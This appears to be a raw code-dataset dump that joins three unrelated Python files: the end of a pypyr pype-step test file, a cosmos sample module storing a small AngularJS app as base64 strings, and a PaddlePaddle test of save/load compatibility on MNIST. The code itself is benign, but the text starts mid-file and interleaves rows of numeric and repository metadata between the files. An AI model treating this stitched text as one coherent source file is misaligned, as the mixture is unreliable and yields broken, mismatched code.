assert str(err_info.value) == (
"pypyr.steps.pype pype.out should be a string, or a list or a dict. "
"Instead, it's a <class 'int'>")
def test_write_child_context_to_parent_string():
"""Single string writes single key to parent."""
parent = Context({'a': 'b'})
child = Context({'c': 'd',
'e': 'f'})
pype.write_child_context_to_parent('c', parent, child)
assert parent == {'a': 'b',
'c': 'd'}
def test_write_child_context_to_parent_list():
"""Single string writes list of keys to parent."""
parent = Context({'a': 'b'})
child = Context({'c': 'd',
'e': 'f',
'g': 'h'})
pype.write_child_context_to_parent(['c', 'g'], parent, child)
assert parent == {'a': 'b',
'c': 'd',
'g': 'h'}
def test_write_child_context_to_parent_dict():
"""Single string maps keys to parent."""
parent = Context({'a': 'b'})
child = Context({'c': 'd',
'e': 'f',
'g': 'h'})
pype.write_child_context_to_parent({'new-c': 'c',
'new-g': 'g'},
parent,
child)
assert parent == {'a': 'b',
'new-c': 'd',
'new-g': 'h'}
def test_write_child_context_to_parent_dict_with_formatting():
"""Single string maps keys to parent and formats child."""
parent = Context({'a': 'b'})
child = Context({'c': 'd',
'e': 'f',
'g': 'h and {e}'})
pype.write_child_context_to_parent({'new-c': 'c',
'new-g': 'g'},
parent,
child)
assert parent == {'a': 'b',
'new-c': 'd',
'new-g': 'h and f'}
# endregion write_child_context_to_parent
| 28.770132 | 79 | 0.586387 | 4,531 | 39,300 | 4.848599 | 0.066431 | 0.034594 | 0.037689 | 0.024762 | 0.825117 | 0.79644 | 0.767627 | 0.755246 | 0.72748 | 0.708362 | 0 | 0.000328 | 0.302392 | 39,300 | 1,365 | 80 | 28.791209 | 0.800992 | 0.101196 | 0 | 0.758721 | 0 | 0 | 0.15577 | 0.002058 | 0 | 0 | 0 | 0 | 0.194767 | 1 | 0.047481 | false | 0.000969 | 0.008721 | 0.000969 | 0.061047 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7d02e607e379c7c8a1acff67b9570eb6fed90645 | 6,258 | py | Python | cosmos/admin/samples/angularbasicdef.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | 1 | 2018-10-12T15:12:15.000Z | 2018-10-12T15:12:15.000Z | cosmos/admin/samples/angularbasicdef.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | null | null | null | cosmos/admin/samples/angularbasicdef.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | null | null | null | # ------------------------------------------------- #
# Auto generated. Modification will be overwritten. #
# ------------------------------------------------- #
import base64
file_data_list=[
{
'name': '/__init__.py', 'data': base64.b64decode(b'X19hdXRob3JfXyA9ICdtYXJ1ZicK')
},
{
'name': '/app/index.html', 'data': base64.b64decode(b'PCFET0NUWVBFIGh0bWw+CjxodG1sIHhtbG5zOm5nPSJodHRwOi8vYW5ndWxhcmpzLm9yZyIgbGFuZz0iZW4iIG5nLWFwcD0iY29zbW9zVUlTaW1wbGVEZW1vIj4KPGhlYWQ+CiAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+CiAgPHRpdGxlPk15IENvb2wgQXBwPC90aXRsZT4KICA8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iTXkgY29vbCBjb3Ntb3MgYW5ndWxhciBqcyBhcHAiPgogIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSI+CiAgICA8IS0tW2lmIGx0ZSBJRSA4XT4KICAgICAgPHNjcmlwdD4KICAgICAgICBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCduZy1pbmNsdWRlJyk7CiAgICAgICAgZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbmctcGx1cmFsaXplJyk7CiAgICAgICAgZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbmctdmlldycpOwoKICAgICAgICAvLyBPcHRpb25hbGx5IHRoZXNlIGZvciBDU1MKICAgICAgICBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCduZzppbmNsdWRlJyk7CiAgICAgICAgZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbmc6cGx1cmFsaXplJyk7CiAgICAgICAgZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbmc6dmlldycpOwogICAgICA8L3NjcmlwdD4KICAgIDwhW2VuZGlmXS0tPgo8L2hlYWQ+Cjxib2R5IHJvbGU9ImRvY3VtZW50Ij4KICAgIDwhLS1baWYgbHQgSUUgN10+CiAgICA8cCBjbGFzcz0iYnJvd3NlaGFwcHkiPllvdSBhcmUgdXNpbmcgYW4gPHN0cm9uZz5vdXRkYXRlZDwvc3Ryb25nPiBicm93c2VyLiBQbGVhc2UgPGEgaHJlZj0iaHR0cDovL2Jyb3dzZWhhcHB5LmNvbS8iPnVwZ3JhZGUgeW91ciBicm93c2VyPC9hPiB0byBpbXByb3ZlIHlvdXIgZXhwZXJpZW5jZS48L3A+CiAgICA8IVtlbmRpZl0tLT4KCiAgICA8ZGl2IG5nLXZpZXc+PC9kaXY+CgogICAgPHNjcmlwdCBzcmM9Ii8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzIuMS4zL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Ii8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvYW5ndWxhcmpzLzEuMy4xNC9hbmd1bGFyLm1pbi5qcyI+PC9zY3JpcHQ+CiAgICA8c2NyaXB0IHNyYz0iLy9hamF4Lmdvb2dsZWFwaXMuY29tL2FqYXgvbGlicy9hbmd1bGFyanMvMS4zLjE0L2FuZ3VsYXItcm91dGUuanMiPjwvc2NyaXB0PgogICAgPCEtLSBMYXRlc3QgY29tcGlsZWQgYW5kIG1pbmlmaWVkIENTUyAtLT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9ib290c3RyYXAvMy4zLjUvY3NzL2Jvb3RzdHJhcC5taW4uY3NzIiAvPgogICAgPCEtLSBPcHRpb25hbCB0aGVtZSAtLT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9ib290c3RyYXAvMy4zLjUvY3NzL2Jvb3RzdHJhcC10aGVtZS5taW4uY3NzIiAvPgogICAgPCEtLSBMYXRlc3QgY29tcGlsZWQgYW5kIG1pbmlmaWVkIEphdmFTY3JpcHQgLS0+CiAgICA8c2NyaXB0IHNyYz0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9ib290c3RyYXAvMy4zLjUvanMvYm9vdHN0cmFwLm1pbi5qcyI+PC9zY3JpcHQ+CgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3MvYXBwLmNzcyIgLz4KCiAgICA8c2NyaXB0IHNyYz0ianMvYXBwLmpzIj48L3NjcmlwdD4KCiAgICA8c2NyaXB0IHNyYz0ianMvY29udHJvbGxlcnMvSG9tZUN0cmwuanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9ImpzL2NvbnRyb2xsZXJzL0Fib3V0Q3RybC5qcyI+PC9zY3JpcHQ+CgoKPC9ib2R5Pgo8L2h0bWw+Cgo=')
},
{
'name': '/app/css/app.css', 'data': base64.b64decode(b'Ym9keSB7CiAgICBwYWRkaW5nLXRvcDogNjBweDsKfQ==')
},
{
'name': '/app/partials/home.html', 'data': base64.b64decode(b'ICAgIDxkaXYgY2xhc3M9Im5hdmJhciBuYXZiYXItaW52ZXJzZSBuYXZiYXItZml4ZWQtdG9wIiByb2xlPSJuYXZpZ2F0aW9uIj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJuYXZiYXItaGVhZGVyIj4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJuYXZiYXItYnJhbmQiIGhyZWY9Ii8jL2hvbWUvIj5Db29sQXBwPC9hPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibmF2YmFyLWNvbGxhcHNlIGNvbGxhcHNlIj4KICAgICAgICAgICAgICAgIDx1bCBjbGFzcz0ibmF2IG5hdmJhci1uYXYiPgogICAgICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iYWN0aXZlIiBocmVmPSIvIy9ob21lLyI+SG9tZTwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvIy9hYm91dC8iPkFib3V0PC9hPjwvbGk+CiAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PgogICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIHRoZW1lLXNob3djYXNlIiByb2xlPSJtYWluIj4KICAgICAgICA8aDE+e3toZWFkZXJ9fTwvaDE+CiAgICA8L2Rpdj4=')
},
{
'name': '/app/partials/about.html', 'data': base64.b64decode(b'ICAgIDxkaXYgY2xhc3M9Im5hdmJhciBuYXZiYXItaW52ZXJzZSBuYXZiYXItZml4ZWQtdG9wIiByb2xlPSJuYXZpZ2F0aW9uIj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJuYXZiYXItaGVhZGVyIj4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJuYXZiYXItYnJhbmQiIGhyZWY9Ii8jL2hvbWUvIj5Db29sQXBwPC9hPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibmF2YmFyLWNvbGxhcHNlIGNvbGxhcHNlIj4KICAgICAgICAgICAgICAgIDx1bCBjbGFzcz0ibmF2IG5hdmJhci1uYXYiPgogICAgICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvIy9ob21lLyI+SG9tZTwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iYWN0aXZlIiBocmVmPSIvIy9hYm91dC8iPkFib3V0PC9hPjwvbGk+CiAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PgogICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIHRoZW1lLXNob3djYXNlIiByb2xlPSJtYWluIj4KICAgICAgICA8aDE+e3toZWFkZXJ9fTwvaDE+CiAgICAgICAgPHA+VGhpcyBpcyBhIHNpbXBsZSBhbmd1bGFyIGpzIGFwcCBmb3IgdXNlIHdpdGggY29zbW9zIGZyYW1ld29yay48L3A+CiAgICA8L2Rpdj4=')
},
{
'name': '/app/js/app.js', 'data': base64.b64decode(b'LyoqCiAqIENyZWF0ZWQgYnkgTWFydWYgTWFuaXJ1enphbWFuIG9uIDcvMy8xNS4KICovCgondXNlIHN0cmljdCc7Cgp2YXIgY29zbW9zVUlTaW1wbGVEZW1vID0gYW5ndWxhci5tb2R1bGUoJ2Nvc21vc1VJU2ltcGxlRGVtbycsIFsKICAgICduZ1JvdXRlJwpdKS4KY29uZmlnKFsnJHJvdXRlUHJvdmlkZXInLCBmdW5jdGlvbigkcm91dGVQcm92aWRlcikgewogICAgJHJvdXRlUHJvdmlkZXIud2hlbignL2hvbWUnLCB7dGVtcGxhdGVVcmw6ICdwYXJ0aWFscy9ob21lLmh0bWwnLCBjb250cm9sbGVyOiAnSG9tZUN0cmwnfSk7CiAgICAkcm91dGVQcm92aWRlci53aGVuKCcvYWJvdXQnLCB7dGVtcGxhdGVVcmw6ICdwYXJ0aWFscy9hYm91dC5odG1sJywgY29udHJvbGxlcjogJ0Fib3V0Q3RybCd9KTsKCiAgICAkcm91dGVQcm92aWRlci5vdGhlcndpc2Uoe3JlZGlyZWN0VG86ICcvaG9tZSd9KTsKfV0pOw==')
},
{
'name': '/app/js/controllers/HomeCtrl.js', 'data': base64.b64decode(b'LyoqCiAqIENyZWF0ZWQgYnkgTWFydWYgTWFuaXJ1enphbWFuIG9uIDcvMy8xNS4KICovCgpjb3Ntb3NVSVNpbXBsZURlbW8uY29udHJvbGxlcignSG9tZUN0cmwnLCBbJyRzY29wZScsICckcm91dGVQYXJhbXMnLCBmdW5jdGlvbiAoJHNjb3BlLCAkcm91dGVQYXJhbXMpIHsKICAgICRzY29wZS5oZWFkZXIgPSAiSGVsbG8gd29ybGQiOwp9XSk7')
},
{
'name': '/app/js/controllers/AboutCtrl.js', 'data': base64.b64decode(b'LyoqCiAqIENyZWF0ZWQgYnkgTWFydWYgTWFuaXJ1enphbWFuIG9uIDcvMy8xNS4KICovCgpjb3Ntb3NVSVNpbXBsZURlbW8uY29udHJvbGxlcignQWJvdXRDdHJsJywgWyckc2NvcGUnLCAnJHJvdXRlUGFyYW1zJywgZnVuY3Rpb24gKCRzY29wZSwgJHJvdXRlUGFyYW1zKSB7CiAgICAkc2NvcGUuaGVhZGVyID0gIkFib3V0IjsKfV0pOw==')
}]
| 195.5625 | 2,620 | 0.939597 | 117 | 6,258 | 50.205128 | 0.487179 | 0.013619 | 0.025877 | 0.027239 | 0.023493 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110644 | 0.010706 | 6,258 | 31 | 2,621 | 201.870968 | 0.838152 | 0.024129 | 0 | 0 | 1 | 0.038462 | 0.942941 | 0.923102 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7d181e998a18c28bf085cc2eacb9c5a80ce59998 | 22,954 | py | Python | framework_api/test_compatible_saveload.py | zjjlivein/continuous_integration | c8825f32136fdd425389702c37ded08d6fd28a26 | [
"Apache-2.0"
] | 14 | 2020-03-04T07:52:07.000Z | 2022-02-14T01:39:14.000Z | framework_api/test_compatible_saveload.py | zjjlivein/continuous_integration | c8825f32136fdd425389702c37ded08d6fd28a26 | [
"Apache-2.0"
] | 19 | 2020-03-04T03:52:10.000Z | 2021-12-23T07:02:07.000Z | framework_api/test_compatible_saveload.py | zjjlivein/continuous_integration | c8825f32136fdd425389702c37ded08d6fd28a26 | [
"Apache-2.0"
] | 26 | 2020-03-04T05:39:09.000Z | 2022-02-14T01:43:28.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test compatible saveload."""
from __future__ import print_function
import numpy
import paddle
import paddle.fluid as fluid
import shutil
BATCH_SIZE = 64
PASS_NUM = 1
use_cuda = True if fluid.core.is_compiled_with_cuda() else False
predict = 'convolutional_neural_network'
def loss_net(hidden, label):
"""
loss net
:param hidden:
:param label:
:return:
"""
prediction = fluid.layers.fc(input=hidden, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=prediction, label=label)
avg_loss = fluid.layers.mean(loss)
acc = fluid.layers.accuracy(input=prediction, label=label)
return prediction, avg_loss, acc
def multilayer_perceptron(img, label):
"""
multilayer_perceptron
:param img:
:param label:
:return:
"""
img = fluid.layers.fc(input=img, size=200, act='tanh')
hidden = fluid.layers.fc(input=img, size=200, act='tanh')
return loss_net(hidden, label)
def softmax_regression(img, label):
"""
softmax
:param img:
:param label:
:return:
"""
return loss_net(img, label)
def convolutional_neural_network(img, label):
"""
cnn
:param img:
:param label:
:return:
"""
conv_pool_1 = fluid.nets.simple_img_conv_pool(
input=img,
filter_size=5,
num_filters=20,
pool_size=2,
pool_stride=2,
act="relu")
conv_pool_1 = fluid.layers.batch_norm(conv_pool_1)
conv_pool_2 = fluid.nets.simple_img_conv_pool(
input=conv_pool_1,
filter_size=5,
num_filters=50,
pool_size=2,
pool_stride=2,
act="relu")
return loss_net(conv_pool_2, label)
def train1(nn_type,
use_cuda,
save_dirname=None,
model_filename=None,
params_filename=None):
"""
train
:param nn_type:
:param use_cuda:
:param save_dirname:
:param model_filename:
:param params_filename:
:return:
"""
if use_cuda and not fluid.core.is_compiled_with_cuda():
return
startup_program = fluid.Program()
main_program = fluid.Program()
with fluid.program_guard(main_program, startup_program):
with fluid.unique_name.guard():
train_reader = paddle.batch(
paddle.dataset.mnist.train(), batch_size=BATCH_SIZE)
test_reader = paddle.batch(
paddle.dataset.mnist.test(), batch_size=BATCH_SIZE)
startup_program.random_seed = 90
main_program.random_seed = 90
img = fluid.data(
name='img', shape=[None, 1, 28, 28], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
if nn_type == 'softmax_regression':
net_conf = softmax_regression
elif nn_type == 'multilayer_perceptron':
net_conf = multilayer_perceptron
else:
net_conf = convolutional_neural_network
prediction, avg_loss, acc = net_conf(img, label)
test_program = main_program.clone(for_test=True)
test_program1 = main_program.clone(for_test=True)
optimizer = fluid.optimizer.Adam(learning_rate=0.001)
optimizer.minimize(avg_loss)
def load(train_test_program, train_test_feed, train_test_reader):
"""
test new load api
:param train_test_program:
:param train_test_feed:
:param train_test_reader:
:return:
"""
acc_set = []
avg_loss_set = []
param_path = "./compatible_save_param"
fluid.load(train_test_program, param_path, exe)
for test_data in train_test_reader():
acc_np, avg_loss_np = exe.run(
program=train_test_program,
feed=train_test_feed.feed(test_data),
fetch_list=[acc, avg_loss])
acc_set.append(float(acc_np))
avg_loss_set.append(float(avg_loss_np))
# get test acc and loss
acc_val_mean = numpy.array(acc_set).mean()
avg_loss_val_mean = numpy.array(avg_loss_set).mean()
return avg_loss_val_mean, acc_val_mean
def train_test(train_test_program, train_test_feed,
train_test_reader):
"""
test
:param train_test_program:
:param train_test_feed:
:param train_test_reader:
:return:
"""
acc_set = []
avg_loss_set = []
param_path = "./compatible_save_param"
fluid.io.load_params(
executor=exe,
dirname=param_path,
main_program=train_test_program)
for test_data in train_test_reader():
acc_np, avg_loss_np = exe.run(
program=train_test_program,
feed=train_test_feed.feed(test_data),
fetch_list=[acc, avg_loss])
acc_set.append(float(acc_np))
avg_loss_set.append(float(avg_loss_np))
# get test acc and loss
acc_val_mean = numpy.array(acc_set).mean()
avg_loss_val_mean = numpy.array(avg_loss_set).mean()
return avg_loss_val_mean, acc_val_mean
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
feeder = fluid.DataFeeder(feed_list=[img, label], place=place)
exe.run(startup_program)
epochs = [epoch_id for epoch_id in range(PASS_NUM)]
lists = []
step = 0
for epoch_id in epochs:
for step_id, data in enumerate(train_reader()):
metrics = exe.run(main_program,
feed=feeder.feed(data),
fetch_list=[avg_loss, acc])
if step % 100 == 0:
print("Pass %d, Epoch %d, Cost %f" % (step, epoch_id,
metrics[0]))
step += 1
if save_dirname is not None:
fluid.io.save_params(exe, "./compatible_save_param",
main_program)
# load_param(test_program1)
# test for epoch
avg_loss_val, acc_val = train_test(
train_test_program=test_program,
train_test_reader=test_reader,
train_test_feed=feeder)
avg_loss_val1, acc_val1 = load(
train_test_program=test_program1,
train_test_reader=test_reader,
train_test_feed=feeder)
print("Test with Epoch %d, avg_cost: %s, acc: %s" %
(epoch_id, avg_loss_val, acc_val))
print("New Test with Epoch %d, avg_cost: %s, acc: %s" %
(epoch_id, avg_loss_val1, acc_val1))
assert avg_loss_val == avg_loss_val1
assert acc_val == acc_val1
lists.append((epoch_id, avg_loss_val, acc_val))
shutil.rmtree("./compatible_save_param")
# find the best pass
best = sorted(lists, key=lambda list: float(list[1]))[0]
print('Best pass is %s, testing Avgcost is %s' % (best[0], best[1]))
print('The classification accuracy is %.2f%%' %
(float(best[2]) * 100))
def train2(nn_type,
use_cuda,
save_dirname=None,
model_filename=None,
params_filename=None):
"""
train
:param nn_type:
:param use_cuda:
:param save_dirname:
:param model_filename:
:param params_filename:
:return:
"""
if use_cuda and not fluid.core.is_compiled_with_cuda():
return
startup_program = fluid.Program()
main_program = fluid.Program()
with fluid.program_guard(main_program, startup_program):
with fluid.unique_name.guard():
train_reader = paddle.batch(
paddle.dataset.mnist.train(), batch_size=BATCH_SIZE)
test_reader = paddle.batch(
paddle.dataset.mnist.test(), batch_size=BATCH_SIZE)
startup_program.random_seed = 90
main_program.random_seed = 90
img = fluid.data(
name='img', shape=[None, 1, 28, 28], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
if nn_type == 'softmax_regression':
net_conf = softmax_regression
elif nn_type == 'multilayer_perceptron':
net_conf = multilayer_perceptron
else:
net_conf = convolutional_neural_network
prediction, avg_loss, acc = net_conf(img, label)
test_program = main_program.clone(for_test=True)
test_program1 = main_program.clone(for_test=True)
optimizer = fluid.optimizer.Adam(learning_rate=0.001)
optimizer.minimize(avg_loss)
def load(train_test_program, train_test_feed, train_test_reader):
"""
test new load api
:param train_test_program:
:param train_test_feed:
:param train_test_reader:
:return:
"""
acc_set = []
avg_loss_set = []
param_path = "./compatible_save_persist"
fluid.load(train_test_program, param_path, exe)
for test_data in train_test_reader():
acc_np, avg_loss_np = exe.run(
program=train_test_program,
feed=train_test_feed.feed(test_data),
fetch_list=[acc, avg_loss])
acc_set.append(float(acc_np))
avg_loss_set.append(float(avg_loss_np))
# get test acc and loss
acc_val_mean = numpy.array(acc_set).mean()
avg_loss_val_mean = numpy.array(avg_loss_set).mean()
return avg_loss_val_mean, acc_val_mean
def train_test(train_test_program, train_test_feed,
train_test_reader):
"""
test
:param train_test_program:
:param train_test_feed:
:param train_test_reader:
:return:
"""
acc_set = []
avg_loss_set = []
param_path = "./compatible_save_persist"
fluid.io.load_persistables(
executor=exe,
dirname=param_path,
main_program=train_test_program)
for test_data in train_test_reader():
acc_np, avg_loss_np = exe.run(
program=train_test_program,
feed=train_test_feed.feed(test_data),
fetch_list=[acc, avg_loss])
acc_set.append(float(acc_np))
avg_loss_set.append(float(avg_loss_np))
# get test acc and loss
acc_val_mean = numpy.array(acc_set).mean()
avg_loss_val_mean = numpy.array(avg_loss_set).mean()
return avg_loss_val_mean, acc_val_mean
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
feeder = fluid.DataFeeder(feed_list=[img, label], place=place)
exe.run(startup_program)
epochs = [epoch_id for epoch_id in range(PASS_NUM)]
lists = []
step = 0
for epoch_id in epochs:
for step_id, data in enumerate(train_reader()):
metrics = exe.run(main_program,
feed=feeder.feed(data),
fetch_list=[avg_loss, acc])
if step % 100 == 0:
print("Pass %d, Epoch %d, Cost %f" % (step, epoch_id,
metrics[0]))
step += 1
if save_dirname is not None:
fluid.io.save_persistables(exe, "./compatible_save_persist",
main_program)
# load_param(test_program1)
# test for epoch
avg_loss_val, acc_val = train_test(
train_test_program=test_program,
train_test_reader=test_reader,
train_test_feed=feeder)
avg_loss_val1, acc_val1 = load(
train_test_program=test_program1,
train_test_reader=test_reader,
train_test_feed=feeder)
print("Test with Epoch %d, avg_cost: %s, acc: %s" %
(epoch_id, avg_loss_val, acc_val))
print("New Test with Epoch %d, avg_cost: %s, acc: %s" %
(epoch_id, avg_loss_val1, acc_val1))
assert avg_loss_val == avg_loss_val1
assert acc_val == acc_val1
lists.append((epoch_id, avg_loss_val, acc_val))
shutil.rmtree("./compatible_save_persist")
# find the best pass
best = sorted(lists, key=lambda list: float(list[1]))[0]
print('Best pass is %s, testing Avgcost is %s' % (best[0], best[1]))
print('The classification accuracy is %.2f%%' %
(float(best[2]) * 100))
def train3(nn_type,
use_cuda,
save_dirname=None,
model_filename=None,
params_filename=None):
"""
train
:param nn_type:
:param use_cuda:
:param save_dirname:
:param model_filename:
:param params_filename:
:return:
"""
if use_cuda and not fluid.core.is_compiled_with_cuda():
return
startup_program = fluid.Program()
main_program = fluid.Program()
with fluid.program_guard(main_program, startup_program):
with fluid.unique_name.guard():
train_reader = paddle.batch(
paddle.dataset.mnist.train(), batch_size=BATCH_SIZE)
test_reader = paddle.batch(
paddle.dataset.mnist.test(), batch_size=BATCH_SIZE)
startup_program.random_seed = 90
main_program.random_seed = 90
img = fluid.data(
name='img', shape=[None, 1, 28, 28], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
if nn_type == 'softmax_regression':
net_conf = softmax_regression
elif nn_type == 'multilayer_perceptron':
net_conf = multilayer_perceptron
else:
net_conf = convolutional_neural_network
prediction, avg_loss, acc = net_conf(img, label)
test_program = main_program.clone(for_test=True)
test_program1 = main_program.clone(for_test=True)
optimizer = fluid.optimizer.Adam(learning_rate=0.001)
optimizer.minimize(avg_loss)
def load(train_test_program, train_test_feed, train_test_reader,
vars):
"""
test new load api
:param train_test_program:
:param train_test_feed:
:param train_test_reader:
:return:
"""
acc_set = []
avg_loss_set = []
param_path = "./compatible_save_vars"
fluid.load(train_test_program, param_path, exe)
for test_data in train_test_reader():
acc_np, avg_loss_np = exe.run(
program=train_test_program,
feed=train_test_feed.feed(test_data),
fetch_list=[acc, avg_loss])
acc_set.append(float(acc_np))
avg_loss_set.append(float(avg_loss_np))
# get test acc and loss
acc_val_mean = numpy.array(acc_set).mean()
avg_loss_val_mean = numpy.array(avg_loss_set).mean()
return avg_loss_val_mean, acc_val_mean
def train_test(train_test_program, train_test_feed,
train_test_reader, vars):
"""
test
:param train_test_program:
:param train_test_feed:
:param train_test_reader:
:return:
"""
acc_set = []
avg_loss_set = []
param_path = "./compatible_save_vars"
fluid.io.load_vars(
executor=exe,
dirname=param_path,
main_program=train_test_program,
vars=vars)
for test_data in train_test_reader():
acc_np, avg_loss_np = exe.run(
program=train_test_program,
feed=train_test_feed.feed(test_data),
fetch_list=[acc, avg_loss])
acc_set.append(float(acc_np))
avg_loss_set.append(float(avg_loss_np))
# get test acc and loss
acc_val_mean = numpy.array(acc_set).mean()
avg_loss_val_mean = numpy.array(avg_loss_set).mean()
return avg_loss_val_mean, acc_val_mean
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
feeder = fluid.DataFeeder(feed_list=[img, label], place=place)
exe.run(startup_program)
epochs = [epoch_id for epoch_id in range(PASS_NUM)]
lists = []
step = 0
for epoch_id in epochs:
for step_id, data in enumerate(train_reader()):
metrics = exe.run(main_program,
feed=feeder.feed(data),
fetch_list=[avg_loss, acc])
if step % 100 == 0:
print("Pass %d, Epoch %d, Cost %f" % (step, epoch_id,
metrics[0]))
step += 1
if save_dirname is not None:
vars = fluid.io.get_program_parameter(main_program)
fluid.io.save_vars(
exe, "./compatible_save_vars", main_program, vars=vars)
# load_param(test_program1)
# test for epoch
avg_loss_val, acc_val = train_test(
train_test_program=test_program,
train_test_reader=test_reader,
train_test_feed=feeder,
vars=vars)
avg_loss_val1, acc_val1 = load(
train_test_program=test_program1,
train_test_reader=test_reader,
train_test_feed=feeder,
vars=vars)
print("Test with Epoch %d, avg_cost: %s, acc: %s" %
(epoch_id, avg_loss_val, acc_val))
print("New Test with Epoch %d, avg_cost: %s, acc: %s" %
(epoch_id, avg_loss_val1, acc_val1))
assert avg_loss_val == avg_loss_val1
assert acc_val == acc_val1
lists.append((epoch_id, avg_loss_val, acc_val))
shutil.rmtree("./compatible_save_vars")
# find the best pass
best = sorted(lists, key=lambda list: float(list[1]))[0]
print('Best pass is %s, testing Avgcost is %s' % (best[0], best[1]))
print('The classification accuracy is %.2f%%' %
(float(best[2]) * 100))
def main1(use_cuda, nn_type):
"""
main
:param use_cuda:
:param nn_type:
:return:
"""
model_filename = None
params_filename = None
save_dirname = "recognize_digits_" + nn_type + ".inference.model"
# call train() with is_local argument to run distributed train
train1(
nn_type=nn_type,
use_cuda=use_cuda,
save_dirname=save_dirname,
model_filename=model_filename,
params_filename=params_filename)
def main2(use_cuda, nn_type):
"""
main
:param use_cuda:
:param nn_type:
:return:
"""
model_filename = None
params_filename = None
save_dirname = "recognize_digits_" + nn_type + ".inference.model"
# call train() with is_local argument to run distributed train
train2(
nn_type=nn_type,
use_cuda=use_cuda,
save_dirname=save_dirname,
model_filename=model_filename,
params_filename=params_filename)
def main3(use_cuda, nn_type):
"""
main
:param use_cuda:
:param nn_type:
:return:
"""
model_filename = None
params_filename = None
save_dirname = "recognize_digits_" + nn_type + ".inference.model"
# call train() with is_local argument to run distributed train
train3(
nn_type=nn_type,
use_cuda=use_cuda,
save_dirname=save_dirname,
model_filename=model_filename,
params_filename=params_filename)
def test_param():
"""
start test save param
:return:
"""
main1(use_cuda=use_cuda, nn_type=predict)
def test_persist():
"""
start test save persist
:return:
"""
main2(use_cuda=use_cuda, nn_type=predict)
def test_vars():
"""
start test save vars
:return:
"""
main3(use_cuda=use_cuda, nn_type=predict)
